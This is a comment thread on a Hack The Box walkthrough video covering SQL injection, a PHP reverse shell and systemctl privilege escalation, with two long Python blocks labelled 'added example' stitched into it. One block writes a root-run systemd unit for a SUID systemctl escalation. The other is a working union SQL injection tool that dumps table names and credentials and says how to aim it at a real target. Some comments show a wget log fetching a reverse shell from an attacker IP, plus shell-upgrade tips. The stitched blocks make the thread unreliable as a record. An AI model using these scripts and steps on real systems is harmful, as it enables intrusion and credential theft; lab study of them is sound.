Thanks for showing the different methods for newbies. Simply wonderful experience to watch your walkthroughs.
Around 25:00: in Burp Repeater, we can use auto-scrolling when it matches. That goes directly to the searched text instead of scrolling or hitting next, by clicking the + sign.
You put /var/ww/html instead of www at 35:57.
But the way you handle the box is really the best! You are beyond imagination.
Awesome solution!
Got my OSCP exam tomorrow and I'm so glad I decided to do an IppSec binge-watch the day before! SQLi is the one thing I'm concerned about (especially LFI/RCE via SQLi) but I learned a LOT from this video!! Thank you sir!
Did you pass?!
@@raycharles6240 Yes :)
@@TheCryptonian Congratulations
Easiest box on HTB.
And kudos to this guy for his continuous effort to make these priceless videos available to us.
Great video!
IppSec, the man that never copy-pastes.
I believe the reason why the systemctl exploit wasn't working from the /tmp directory is that modern Linux systems started implementing separate /tmp directories for each user, as a security measure. In this case, the root user was probably referring to its own /tmp dir, and hence not seeing the files being placed by user pepper in their /tmp dir.
That's why it's better to use a directory accessible by both users, e.g. /dev/shm, when attempting an escalation.
Thanks man!! I made a tmp dir in pepper's home and then linked it! Finally it worked!!
I have so many nice things to say about you, IppSec. You are a living LEGEND.
I loved the section on crafting SQLi around 16:00 -- thanks so much!
Wow epic! I learn a lot from this. More videos like this please 👍
Thanks again for the wonderful video man. You're beyond awesome at this point.
Thanks for the vid, really enjoyed this one
For the systemctl in GTFObins, I believe that first command sets SUID for the systemctl binary. No idea why they include it there, if you can set it you're already root xD
A little trick, since you manually searched for 'price' in burp all the time: to the left of the search field you can set it to autoscroll to the search value on every reload.
That is just for reproducing the stuff you wanna try.
If you want to try the SUID misconfig for systemctl, you set the SUID bit on systemctl and try it.
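A check a practitioner would want before trying the systemctl trick discussed in the two threads above, as an added example (this is not code from the video, from GTFObins, or from anyone in the thread; the sample mountinfo text, the marker command and the unit name are constructed for the demo). If the shell you are in descends from a service started with systemd's PrivateTmp=, /proc/self/mountinfo lists /tmp as a bind mount whose root field (4th column) is /tmp/systemd-private-<id>-<unit>-<random>/tmp, and anything written there is invisible to the /tmp that PID 1, and therefore the unit you link and start, will see. The script detects that case, falls back to /dev/shm, writes the same oneshot unit GTFObins uses, and returns the two systemctl commands to run with the SUID copy:

```python
"""Is /tmp namespaced? Pick a drop directory for a systemd unit accordingly.

Added example, not from the video or the thread. Parses /proc/self/mountinfo,
whose columns are: id parent major:minor root mountpoint options ... - fstype source superopts
"""
import os
import tempfile

# Constructed sample of /proc/self/mountinfo as seen from inside a PrivateTmp
# service: /tmp is a bind mount of a systemd-private-* directory (4th column).
SAMPLE_PRIVATE_TMP = """\
22 27 0:21 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
27 0 8:1 / / rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
31 27 0:22 / /dev/shm rw,nosuid,nodev - tmpfs tmpfs rw
85 27 8:1 /tmp/systemd-private-2b1c-apache2.service-Wx9fQ1/tmp /tmp rw,relatime - ext4 /dev/sda1 rw
"""

# Constructed sample of a normal shell where /tmp is just part of the root fs.
SAMPLE_SHARED_TMP = """\
22 27 0:21 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
27 0 8:1 / / rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
31 27 0:22 / /dev/shm rw,nosuid,nodev - tmpfs tmpfs rw
"""


def tmp_is_private(mountinfo_text):
    """True when /tmp is a bind mount of a systemd PrivateTmp directory, so files
    written there are invisible to the /tmp that PID 1 (and the new unit) sees."""
    for line in mountinfo_text.splitlines():
        fields = line.split()
        if len(fields) >= 5 and fields[4] == "/tmp" and "/systemd-private-" in fields[3]:
            return True
    return False


def pick_drop_dir(mountinfo_text, candidates=("/tmp", "/dev/shm")):
    """First writable candidate, skipping /tmp when it is namespaced."""
    for d in candidates:
        if d == "/tmp" and tmp_is_private(mountinfo_text):
            continue
        if os.path.isdir(d) and os.access(d, os.W_OK):
            return d
    return None


def unit_text(command):
    """The oneshot unit GTFObins uses: ExecStart runs as root once the unit starts."""
    return ("[Service]\n"
            "Type=oneshot\n"
            f'ExecStart=/bin/sh -c "{command}"\n'
            "[Install]\n"
            "WantedBy=multi-user.target\n")


def write_unit(directory, command):
    """Write the unit into directory; return its path and the two commands to run
    with the SUID systemctl copy (link the file, then enable --now to start it)."""
    fd, path = tempfile.mkstemp(suffix=".service", dir=directory)
    with os.fdopen(fd, "w") as fh:
        fh.write(unit_text(command))
    return path, [f"./systemctl link {path}", f"./systemctl enable --now {path}"]


if __name__ == "__main__":
    live = SAMPLE_PRIVATE_TMP
    if os.path.exists("/proc/self/mountinfo"):  # use the real thing on Linux
        with open("/proc/self/mountinfo") as fh:
            live = fh.read()
    drop = pick_drop_dir(live)
    print("/tmp is private:", tmp_is_private(live), "-> dropping unit in", drop)
    if drop:
        # Marker command is constructed for the demo; it writes to the shared dir too.
        path, cmds = write_unit(drop, "id > /dev/shm/output")
        print(path)
        print("\n".join(cmds))
```

The same mismatch can be confirmed by hand from two shells: `grep ' /tmp ' /proc/self/mountinfo` in each; if only one shows a systemd-private-* root, files in /tmp will not line up between them.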
I learn so much from these videos! Thank you for sharing the knowledge.
Could you do a tutorial on hashcat, how to use it like you did at 33:14?
Thanks a lot for doing this, it teaches me SQL injection :)
When you see he is hitting a character limit in the field at 31:00 and you want so bad to help him from spinning in circles. Dude's a legend though. Anyone wanting to do all the steps do a [from+information_Schema.TABLES+where+TABLE_SCHEMA+=+'mysql'] and you see users and can drill down from there.
IppSec you make my Saturdays. 👍
Laudanum stands for liquid morphine that was used back in 1910 to 1940, I reckon. Those veterans never came back the same.
And I just used sqlmap to do it for me... that's why I love how you do it, I keep learning!
Nice video dude.
Thank you for the explanation, but I have a question: why did you fuzz the website instead of using sqlmap?
Because when you added '--- I suspected blind SQL injection according to the output that you got.
I don't fully remember this box, but generally I like to fuzz the output prior to SQLMap. I go from simplest -> most complex. I consider single-character fuzzes super simple, I'm just looking at how a field behaves to certain characters.
SQLMap is a bit more complex, as it's attempting to identify the language it's coded in, the database software, and the types of injections it's vulnerable to.
You'll rarely see me just blindly launch SQLMap unless there's another task I want to do and am just throwing SQLMap in the background. However, SQLMap will crash servers (even one in OffShore!) so use with care.
@@ippsec I read a write-up somewhere and the user bypassed the risk of getting banned for 90 sec by adding a user-agent to his sqlmap, but he didn't explain what happened. Can you please demonstrate how he managed to bypass the banning through adding a user-agent?
@@Haxr-dq6wt If you use SQLMap the way I generally show, by copying the HTTP Request from Burp to a file then using SQLMap with the HTTP Request (-r), it will automatically use the User-Agent of your web browser and you don't need to worry about it. If you want to learn more, just use the --proxy option in SQLMap to send it through Burp and look at the HTTP Requests to see the difference when you run `sqlmap ` and `sqlmap -r `. I've shown this in a video before but not sure which one.
Could someone please explain to me why we don't need to use a ' to break out of the select statement?
I got initial shell by calling "--os-shell" on sqlmap, but I guess this is the real way to do it ;p
That trick with python to get a proper shell is amazing.... what does the "stty raw -echo" do?
It allows for tab completion in the shell. First, run `python -c 'import pty;pty.spawn("/bin/bash")'` (or python3 depending on the box), then Ctrl-Z (to background), `stty raw -echo`, `fg` (Enter, to bring it back to the foreground), then Enter, Enter to see your prompt again in the new & improved shell.
@@user-bg9xo2xv6v thanks man!
Thank you for using manual SQL injection, learning lots with your videos.
Anyone running into this problem? At 59:00, when trying to hit the URL with the rev shell:
--2020-07-03 19:50:46-- 10.10.14.30/rev.php
Connecting to 10.10.14.30:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5493 (5.4K) [application/octet-stream]
Saving to: 'rev.php.1'
0K ..... 100% 6.56M=0.001s
2020-07-03 19:50:47 (6.56 MB/s) - 'rev.php.1' saved [5493/5493]
Also, I noticed two requests are made every time.
Bro, use "-O" instead of "-o" in the wget SQL query.. hehe I did the same and just noticed.. XD
@@karanluniyal3053 Thanks brother
Where can I get these Hack The Box files? And do I run them, say, on a Raspberry Pi?
@personalchannle hackthebox.eu.
You inspire me and probably others to be a pen tester. Have you got any advice?
One question: how do you split your terminal into two?
@@personalchannle9159 Look up "tmux"
@@personalchannle9159 He uses tmux and has a video about it that goes over what it does.
The first time you did LOAD_FILE you only had 2 w's: /var/ww/html
Can confirm that I also had to reset the session ID when exploiting phpmyadmin and trying a new PHP one-liner. As shown in the video, it's a spot where you can potentially waste a lot of time if you make a syntax error, correct it, and then forget to reset the session.
Awesome video!
Great as always.
I will purchase a kraken-like machine then return to HTB.
With an ancient AMD, I hardly can do anything.
Just use Crackstation for your HTB hash cracks.
@@Rezurrektz Unfortunately, the same thing is true for the CPU too, not just the GPU. So it's worse than a "budget" processor. Anyways, that's a good idea. Thank you!
@@mr.fakeman4718 The majority of the hashes on HTB are weak on purpose. Just don't crack them within a VM and the cracking stuff is more than doable. I just do not want to record my host OS's screen in case notifications or something pop up.
@@ippsec Understood. Thank you very much! I've just attended a sysadmin course because it gives me credits. Only gives CCNA, but at least I'm one of the smartest people. Btw what was your way of becoming that expert/omniscient? Sorry if somebody asked this before, just couldn't find a comment about this.
Is HTB free or should I pay to play?
@Djebbar ANON it's free mate, there's a premium version too.
@@mohamedzumri4305 What's the difference between the free version and the premium version?
@@djebbaranon5892 Premium you can hack older boxes, you also get on less crowded servers, it's easily worth the $12 or whatever it is.
@@Daniel-ng8fi And what about the free version? I can't hack old boxes like Popcorn?
@@djebbaranon5892 I don't believe so, or maybe there are only a few you can, but VIP gets you all of them.
Instead of doing UNION SELECT 1,2,3,4 and so on, I think you can just use ORDER BY and the number you want to test.
Perfect!
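The manual chain that several comments in this thread touch on (single-character fuzzing, ORDER BY n to count columns instead of UNION SELECT 1,2,3..., UNION SELECT with markers to find which columns are reflected, then a query against the information-schema catalogue to list tables and pull rows), carried out end to end as an added example. This is not code from the video or from anyone in the thread. It runs against a constructed in-memory sqlite3 database that stands in for the MySQL backend, so sqlite_master and group_concat() take the place of information_schema.TABLES and GROUP_CONCAT(); the page layout, table names and the `cod` parameter are assumptions for the demo. It also answers the quote question above in code: the parameter sits in a numeric context (`WHERE id = 1`), so the payload is never inside a string literal and nothing has to be closed with a '.

```python
"""Union-based SQL injection, step by step, against a simulated numeric-context query.

Added example, not from the video or the thread. The target is a constructed
in-memory sqlite3 database standing in for MySQL (sqlite_master ~ information_schema.TABLES,
group_concat() ~ GROUP_CONCAT(), '||' ~ CONCAT()).
"""
import re
import sqlite3


def build_app():
    """Return a page(cod) function that behaves like the vulnerable endpoint."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE rooms(id INTEGER, name TEXT, price INTEGER, stars INTEGER);
        INSERT INTO rooms VALUES (1, 'Suite', 150, 5), (2, 'Single', 60, 3);
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'NotARealHash');   -- constructed sample row
    """)

    def page(cod):
        # Numeric context: cod is dropped into the query unquoted, which is why
        # none of the payloads below needs a ' to break out of the statement.
        try:
            rows = conn.execute(
                f"SELECT name, price, stars FROM rooms WHERE id = {cod}"
            ).fetchall()
        except sqlite3.Error:
            return "Database error"  # generic error page, as a real app would show
        return "\n".join(f"{n} costs {p} ({s} stars)" for n, p, s in rows)

    return page


def fuzz_chars(page, base="1", chars="'\"-)"):
    """Step 1 (single-character fuzz): which characters change the page at all?"""
    baseline = page(base)
    return [c for c in chars if page(base + c) != baseline]


def find_column_count(page, base="1", max_cols=20):
    """Step 2: raise ORDER BY n until the page changes; the last n that still
    returned the baseline is the number of columns the original SELECT has."""
    baseline = page(base)
    for n in range(1, max_cols + 1):
        if page(f"{base} ORDER BY {n}") != baseline:
            return n - 1
    return None


def find_reflected_columns(page, ncols):
    """Step 3: UNION SELECT a distinct marker per column and see which appear."""
    markers = [f"MARK{i}X" for i in range(1, ncols + 1)]
    resp = page("-1 UNION SELECT " + ",".join(f"'{m}'" for m in markers))
    return [i + 1 for i, m in enumerate(markers) if m in resp]


def union_extract(page, ncols, slot, scalar_sql):
    """Pull one scalar subquery out through a reflected column, bracketed with
    <<...>> so it can be parsed back out of whatever the page renders around it."""
    cols = ["NULL"] * ncols
    cols[slot - 1] = f"'<<'||({scalar_sql})||'>>'"  # MySQL: CONCAT('<<',(...),'>>')
    resp = page("-1 UNION SELECT " + ",".join(cols))
    m = re.search(r"<<(.*?)>>", resp, re.S)
    return m.group(1) if m else None


def enumerate_db(page):
    """Step 4: chain it all and dump the table list plus the users rows."""
    ncols = find_column_count(page)
    slot = find_reflected_columns(page, ncols)[0]
    # MySQL equivalent: SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='mysql'
    tables = union_extract(page, ncols, slot,
        "SELECT group_concat(name, ',') FROM sqlite_master WHERE type='table'")
    creds = union_extract(page, ncols, slot,
        "SELECT group_concat(username||':'||password, ';') FROM users")
    return {
        "fuzz": fuzz_chars(page),
        "columns": ncols,
        "reflected": find_reflected_columns(page, ncols),
        "tables": sorted(tables.split(",")) if tables else [],
        "creds": creds.split(";") if creds else [],
    }


if __name__ == "__main__":
    print(enumerate_db(build_app()))
```

Against a real target, replace `build_app()` with a function that sends the payload in the vulnerable parameter and returns the response body, and swap the two sqlite-specific subqueries for their information_schema / GROUP_CONCAT forms; the ORDER BY and marker steps work unchanged on MySQL.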
Hi ippsec, I have a question:
How can I see a PHP file in a website? Because when I click on it nothing works, also I don't have permission to see that, permission denied.
I have that in wp-content!
Thx
@plushoom, yes, when I click the PHP file a blank page comes out, I can't see the content of the PHP file.
@Copyright it's normal, the PHP code is being processed by the server so you can't see the code.
thank you :)
Can I ever be able to hack like you? 🥴🥴
Thanks a lot lot lot lot lot